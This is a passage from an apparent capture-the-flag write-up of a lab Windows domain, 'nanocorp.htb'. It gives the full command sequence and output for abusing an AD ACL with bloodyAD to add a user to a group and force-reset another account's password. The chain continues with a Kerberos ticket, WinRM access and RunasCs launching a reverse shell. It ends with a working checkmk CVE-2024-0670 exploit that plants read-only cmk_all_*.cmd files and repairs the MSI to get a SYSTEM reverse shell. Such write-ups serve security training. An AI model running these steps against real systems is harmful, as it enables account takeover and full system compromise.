P;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-527)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
--
distinguishedName: OU=AD_Monitoring,DC=nanocorp,DC=htb
nTSecurityDescriptor: O:S-1-5-21-2261381271-1331810270-697239744-512G:S-1-5-21-2261381271-1331810270-697239744-512D:AI(D;;0x10040;;;S-1-1-0)(OA;CIIO;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-2261381271-1331810270-697239744-3102)(OA;CIIO;0x20014;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-2261381271-1331810270-697239744-3102)(OA;;0x3;4828cc14-1437-45bc-9b07-ad6f015e5f28;;S-1-5-32-548)(OA;;0x3;bf967a86-0de6-11d0-a285-00aa003049e2;;S-1-5-32-548)(OA;;0x3;bf967a9c-0de6-11d0-a285-00aa003049e2;;S-1-5-32-548)(OA;;0x3;bf967aa8-0de6-11d0-a285-00aa003049e2;;S-1-5-32-550)(OA;;0x3;bf967aba-0de6-11d0-a285-00aa003049e2;;S-1-5-32-548)(A;;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-512)(A;;0x20094;;;S-1-5-9)(A;;0x20094;;;S-1-5-11)(A;;0xf01ff;;;S-1-5-18)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;4c164200-20c0-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-526)(OA;CIID;0x30;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-2261381271-1331810270-697239744-527)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-3-0)(OA;CIIOID;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-9)(OA;CIIOID;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-10)(OA;CIIOID;0x20094;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;CIIOID;0x20094;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-32-554)(OA;OICIID;0x30;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;S-1-5-10)(OA;CIID;0x130;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;S-1-5-10)(A;CIID;0xf01ff;;;S-1-5-21-2261381271-1331810270-697239744-519)(A;CIID;LC;;;S-1-5-32-554)(A;CIID;0xf01bd;;;S-1-5-32-544)
Looks like we have a couple of matches for the AD_Monitoring Organizational Unit(OU) and, even more interestingly the monitoring_svc user. Let’s take a look at monitoring_svc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' get object 'monitoring_svc' --resolve-sd
distinguishedName: CN=monitoring_svc,OU=AD_Monitoring,DC=nanocorp,DC=htb
accountExpires: 1601-01-01 00:00:00+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: monitoring_svc
codePage: 0
countryCode: 0
dSCorePropagationData: 2025-04-09 22:57:47+00:00
displayName: monitoring_svc
givenName: monitoring_svc
instanceType: 4
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-04-10 01:15:05.371190+00:00
lastLogonTimestamp: 2025-04-10 01:15:05.371190+00:00
logonCount: 1
logonHours: ////////////////////////////
memberOf: CN=Protected Users,CN=Users,DC=nanocorp,DC=htb; CN=Remote Management Users,CN=Builtin,DC=nanocorp,DC=htb
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_PRESENT|SELF_RELATIVE
nTSecurityDescriptor.ACL.0.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.0.Trustee: RAS and IAS Servers
nTSecurityDescriptor.ACL.0.Right: READ_PROP
nTSecurityDescriptor.ACL.0.ObjectType: Logon-Information (property set); Remote-Access-Information (property set); Group-Membership (property set); Account-Restrictions (property set)
nTSecurityDescriptor.ACL.1.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.1.Trustee: Cert Publishers
nTSecurityDescriptor.ACL.1.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.1.ObjectType: X509-Cert
nTSecurityDescriptor.ACL.2.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.2.Trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
nTSecurityDescriptor.ACL.2.Right: READ_PROP
nTSecurityDescriptor.ACL.2.ObjectType: Token-Groups-Global-And-Universal
nTSecurityDescriptor.ACL.3.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.3.Trustee: TERMINAL_SERVER_LICENSE_SERVERS
nTSecurityDescriptor.ACL.3.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.3.ObjectType: Terminal-Server; Terminal-Server-License-Server (property set)
nTSecurityDescriptor.ACL.4.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.4.Trustee: EVERYONE
nTSecurityDescriptor.ACL.4.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.4.ObjectType: User-Change-Password
nTSecurityDescriptor.ACL.5.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.5.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.5.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.5.ObjectType: Receive-As; Send-As; User-Change-Password
nTSecurityDescriptor.ACL.6.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.6.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.6.Right: READ_PROP
nTSecurityDescriptor.ACL.6.ObjectType: Web-Information (property set); General-Information (property set); Personal-Information (property set); Public-Information (property set)
nTSecurityDescriptor.ACL.7.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.7.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.7.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.7.ObjectType: Phone-and-Mail-Options (property set); Web-Information (property set); Personal-Information (property set)
nTSecurityDescriptor.ACL.8.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.8.Trustee: ACCOUNT_OPERATORS; LOCAL_SYSTEM; Domain Admins
nTSecurityDescriptor.ACL.8.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.8.ObjectType: Self
nTSecurityDescriptor.ACL.9.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.9.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.9.Right: READ_SD
nTSecurityDescriptor.ACL.9.ObjectType: Self
nTSecurityDescriptor.ACL.10.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.10.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.10.Right: GENERIC_READ
nTSecurityDescriptor.ACL.10.ObjectType: Self
+ nTSecurityDescriptor.ACL.11.Type: == ALLOWED_OBJECT ==
+ nTSecurityDescriptor.ACL.11.Trustee: IT_Support
+ nTSecurityDescriptor.ACL.11.Right: CONTROL_ACCESS
+ nTSecurityDescriptor.ACL.11.ObjectType: User-Force-Change-Password
+ nTSecurityDescriptor.ACL.11.InheritedObjectType: User
+ nTSecurityDescriptor.ACL.11.Flags: CONTAINER_INHERIT; INHERITED
+ nTSecurityDescriptor.ACL.12.Type: == ALLOWED_OBJECT ==
+ nTSecurityDescriptor.ACL.12.Trustee: IT_Support
+ nTSecurityDescriptor.ACL.12.Right: GENERIC_EXECUTE|READ_PROP
+ nTSecurityDescriptor.ACL.12.ObjectType: Self
+ nTSecurityDescriptor.ACL.12.InheritedObjectType: User
+ nTSecurityDescriptor.ACL.12.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.13.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.13.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.13.Right: READ_PROP
nTSecurityDescriptor.ACL.13.ObjectType: General-Information (property set); Remote-Access-Information (property set); Group-Membership (property set); Logon-Information (property set); Account-Restrictions (property set)
nTSecurityDescriptor.ACL.13.InheritedObjectType: inetOrgPerson
nTSecurityDescriptor.ACL.13.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.14.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.14.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.14.Right: READ_PROP
nTSecurityDescriptor.ACL.14.ObjectType: General-Information (property set); Remote-Access-Information (property set); Group-Membership (property set); Logon-Information (property set); Account-Restrictions (property set)
nTSecurityDescriptor.ACL.14.InheritedObjectType: User
nTSecurityDescriptor.ACL.14.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.15.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.15.Trustee: Enterprise Key Admins; Key Admins
nTSecurityDescriptor.ACL.15.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.15.ObjectType: ms-DS-Key-Credential-Link
nTSecurityDescriptor.ACL.15.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.16.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.16.Trustee: PRINCIPAL_SELF; CREATOR_OWNER
nTSecurityDescriptor.ACL.16.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.16.ObjectType: DS-Validated-Write-Computer
nTSecurityDescriptor.ACL.16.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.16.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.17.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.17.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.17.Right: READ_PROP
nTSecurityDescriptor.ACL.17.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.17.InheritedObjectType: Computer; Group
nTSecurityDescriptor.ACL.17.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.18.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.18.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.18.Right: READ_PROP
nTSecurityDescriptor.ACL.18.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.18.InheritedObjectType: User
nTSecurityDescriptor.ACL.18.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.19.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.19.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.19.Right: WRITE_PROP
nTSecurityDescriptor.ACL.19.ObjectType: ms-TPM-Tpm-Information-For-Computer
nTSecurityDescriptor.ACL.19.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.19.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.20.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.20.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.20.Right: GENERIC_READ
nTSecurityDescriptor.ACL.20.ObjectType: Self
nTSecurityDescriptor.ACL.20.InheritedObjectType: inetOrgPerson; Group
nTSecurityDescriptor.ACL.20.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.21.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.21.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.21.Right: GENERIC_READ
nTSecurityDescriptor.ACL.21.ObjectType: Self
nTSecurityDescriptor.ACL.21.InheritedObjectType: User
nTSecurityDescriptor.ACL.21.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.22.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.22.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.22.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.22.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
nTSecurityDescriptor.ACL.22.Flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
nTSecurityDescriptor.ACL.23.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.23.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.23.Right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.23.ObjectType: Private-Information (property set)
nTSecurityDescriptor.ACL.23.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.24.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.24.Trustee: Enterprise Admins
nTSecurityDescriptor.ACL.24.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.24.ObjectType: Self
nTSecurityDescriptor.ACL.24.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.25.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.25.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.25.Right: LIST_CHILD
nTSecurityDescriptor.ACL.25.ObjectType: Self
nTSecurityDescriptor.ACL.25.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.26.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.26.Trustee: BUILTIN_ADMINISTRATORS
nTSecurityDescriptor.ACL.26.Right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
nTSecurityDescriptor.ACL.26.ObjectType: Self
nTSecurityDescriptor.ACL.26.Flags: CONTAINER_INHERIT; INHERITED
name: monitoring_svc
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=nanocorp,DC=htb
objectClass: top; person; organizationalPerson; user
objectGUID: ad8bdb53-ee9b-4056-a80c-b31aa4037ad6
objectSid: S-1-5-21-2261381271-1331810270-697239744-3101
primaryGroupID: 513
pwdLastSet: 2025-11-09 06:28:54.913940+00:00
sAMAccountName: monitoring_svc
sAMAccountType: 805306368
uSNChanged: 172665
uSNCreated: 77904
userAccountControl: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
userPrincipalName: monitoring_svc@nanocorp.htb
whenChanged: 2025-11-09 06:28:54+00:00
whenCreated: 2025-04-09 22:47:18+00:00
Looks like they’re a member of Protected_Users and Remote Management. Additionally the IT_Support group has the ability to User-Force-Change-Password. Which allows us to change the object’s password.
Having gathered a path to a Remote Management user let’s execute on this path. First we add ourselves to the IT_Support group.
1
2
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' add groupMember 'IT_Support' 'web_svc'
[+] web_svc added to IT_Support
Next let’s force change password on monitoring_svc.
1
2
bloodyAD -d 'nanocorp.htb' --host 'dc01.nanocorp.htb' -u 'web_svc' -p 'dksehdgh712!@#' set password 'monitoring_svc' 'Password123!'
[+] Password changed successfully!
Attempting to simply evil-winrm doesn’t work so let’s grab a TGT
1
2
3
4
sudo ntpdate -s dc01.nanocorp.htb; getTGT.py 'nanocorp.htb/monitoring_svc:Password123!'
Impacket v0.13.0.dev0+20251016.112753.23a36c62 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in monitoring_svc.ccache
Next let’s also generate a krb5.conf file, I’ll be using Ben Heater’s Method.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
LOWER_REALM='nanocorp.htb'
UPPER_REALM=$(echo "$LOWER_REALM" | tr '[:lower:]' '[:upper:]')
DC_HOSTNAME='DC01'
cat << EOF | sed \
-e "s//$UPPER_REALM/g" \
-e "s//$LOWER_REALM/g" \
-e "s//$DC_HOSTNAME/g" > custom_krb5.conf
[libdefaults]
default_realm =
dns_lookup_realm = true
dns_lookup_kdc = true
[realms]
= {
kdc = .
admin_server = .
default_domain =
}
[domain_realm]
=
. =
EOF
export KRB5_CONFIG=$(pwd)/custom_krb5.conf
export KRB5CCNAME=$(pwd)/monitoring_svc.ccache
So now we can attempt to winrmexec
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
winrmexec.py nanocorp.htb/monitoring_svc@dc01.nanocorp.htb -k -no-pass -ssl
/home/kali/.cache/uv/environments-v2/winrmexec-8aa50ec8544e68a3/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
'prompt_toolkit' not installed, using built-in 'readline'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] '-target_ip' not specified, using dc01.nanocorp.htb
[*] '-port' not specified, using 5986
[*] '-url' not specified, using https://dc01.nanocorp.htb:5986/wsman
[*] using domain and username from ccache: NANOCORP.HTB\monitoring_svc
[*] '-spn' not specified, using HTTP/dc01.nanocorp.htb@NANOCORP.HTB
[*] '-dc-ip' not specified, using NANOCORP.HTB
[*] requesting TGS for HTTP/dc01.nanocorp.htb@NANOCORP.HTB
PS C:\Users\monitoring_svc\Documents> ls ../Desktop
Directory: C:\Users\monitoring_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/8/2025 9:21 PM 34 user.txt
PS C:\Users\monitoring_svc\Documents>
Just like that, we have User!
Root
Looking around we can find checkmk which is a monitoring service.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
PS C:\w1ld> ls -fo 'C:\Program Files (x86)\'
Directory: C:\Program Files (x86)
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/5/2025 4:17 PM checkmk
d----- 5/8/2021 1:34 AM Common Files
d----- 11/3/2025 4:13 PM Internet Explorer
d----- 5/8/2021 2:40 AM Microsoft
d----- 5/8/2021 1:34 AM Microsoft.NET
d----- 5/8/2021 2:35 AM Windows Defender
d----- 11/3/2025 4:13 PM Windows Mail
d----- 11/3/2025 4:13 PM Windows Media Player
d----- 5/8/2021 2:35 AM Windows NT
d----- 11/3/2025 4:13 PM Windows Photo Viewer
d--hs- 5/8/2021 1:34 AM Windows Sidebar
d----- 5/8/2021 1:34 AM WindowsPowerShell
-a-hs- 5/8/2021 1:18 AM 174 desktop.ini
PS C:\w1ld>
Doing some research, we can find a vulnerability CVE-2024-0670. We aren’t able to view the contents of C:\Windows\Temp, so let’s swap over to web_svc using RunasCs.exe
1
PS C:\w1ld> .\RunasCs.exe web_svc 'dksehdgh712!@#' C:\w1ld\comp_win.exe
The contents of
comp_win.exeis a customized reverse shell for thecompetitiveVPN forwindowshosts, I have a few of these always available to me.
Let’s take a look in the Temp directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
PS C:\w1ld> whoami
nanocorp\web_svc
PS C:\w1ld> ls C:\Windows\Temp
Directory: C:\Windows\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2025 5:05 PM vmware-SYSTEM
-a---- 11/8/2025 9:21 PM 53 af397ef28e484961ba48646a5d38cf54.db.ses
-a---- 11/8/2025 9:21 PM 0 mat-debug-5448.log
-a---- 11/8/2025 11:22 PM 33310 MpCmdRun.log
-a---- 11/8/2025 9:21 PM 102 silconfig.log
-a---- 11/4/2025 3:20 PM 189079 vmware-vmsvc-SYSTEM.log
-a---- 11/4/2025 3:18 PM 16602 vmware-vmtoolsd-Administrator.log
-a---- 11/8/2025 9:21 PM 20998 vmware-vmtoolsd-SYSTEM.log
-a---- 11/8/2025 9:38 PM 4891 vmware-vmtoolsd-web_svc.log
-a---- 11/4/2025 3:20 PM 66145 vmware-vmusr-Administrator.log
-a---- 11/8/2025 9:38 PM 5980 vmware-vmusr-web_svc.log
-a---- 11/8/2025 9:21 PM 20132 vmware-vmvss-SYSTEM.log
Now that we have access to view the contents let’s run the installer and check the contents really quickly.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
PS C:\w1ld> msiexec /fa C:\Windows\Installer\1e6f2.msi
PS C:\w1ld> ls C:\Windows\Temp
Directory: C:\Windows\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2025 5:05 PM vmware-SYSTEM
-a---- 11/8/2025 9:21 PM 53 af397ef28e484961ba48646a5d38cf54.db.ses
-a---- 11/8/2025 11:46 PM 1069 cmk_all_5252_1.cmd
-a---- 11/8/2025 11:46 PM 423 cmk_data_5252_2.cmd
-a---- 11/8/2025 9:21 PM 0 mat-debug-5448.log
-a---- 11/8/2025 11:22 PM 33310 MpCmdRun.log
-a---- 11/8/2025 9:21 PM 102 silconfig.log
-a---- 11/4/2025 3:20 PM 189079 vmware-vmsvc-SYSTEM.log
-a---- 11/4/2025 3:18 PM 16602 vmware-vmtoolsd-Administrator.log
-a---- 11/8/2025 9:21 PM 20998 vmware-vmtoolsd-SYSTEM.log
-a---- 11/8/2025 9:38 PM 4891 vmware-vmtoolsd-web_svc.log
-a---- 11/4/2025 3:20 PM 66145 vmware-vmusr-Administrator.log
-a---- 11/8/2025 9:38 PM 5980 vmware-vmusr-web_svc.log
-a---- 11/8/2025 9:21 PM 20132 vmware-vmvss-SYSTEM.log
Let’s now write a powershell script taking into account the cmk_all_x_1.cmd range. I’ll do about a thousand total, 500 before, and 500 after since that’s how many the disk can carry as far as I can tell.
1
2
3
4
5
PS C:\w1ld> type w1ld.ps1
4752..5752 | foreach {
copy C:\w1ld\root.exe C:\Windows\Temp\cmk_all_${_}_1.cmd;
Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;
}
The contents of
root.exeis simply a tiny executable that gets the contents of root.txt and puts it into a file, you can also do a tiny reverse shell if you want, keep in mind that Windows Defender is running.
Now let’s run this script and run the installer quickly, make sure to wait for the cmk_all files that are already there to be deleted before running the script.
1
2
PS C:\w1ld> ./w1ld.ps1
PS C:\w1ld> msiexec /fa C:\Windows\Installer\1e6f2.msi
Just like that, we have Root!
Beyond Root
Later on I discovered that since the files were cmd files we can instead write a simple cmd that will trigger my reverse shell and it would be tiny enough to just cover a massive range of process IDs for the file names.
1
2
PS C:\w1ld> type root.cmd
C:/w1ld/comp_win.exe
Let’s also make changes to the script to go wider with our target IDs since we have a tiny payload we can copy it a lot more times.
1
2
3
4
5
PS C:\w1ld> type w1ld.ps1
1000..9000 | foreach {
copy C:\w1ld\root.cmd C:\Windows\Temp\cmk_all_${_}_1.cmd;
Set-ItemProperty -path C:\Windows\Temp\cmk_all_${_}_1.cmd -name IsReadOnly -value $true;
}
Just as usual run the script and the installer.
1
2
PS C:\w1ld> ./w1ld.ps1
PS C:\w1ld> msiexec /fa C:\Windows\Installer\1e6f2.msi
And I receive a callback on my reverse shell listener!
1
2
3
4
5
6
7
Windows Powershell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> whoami
nt authority\system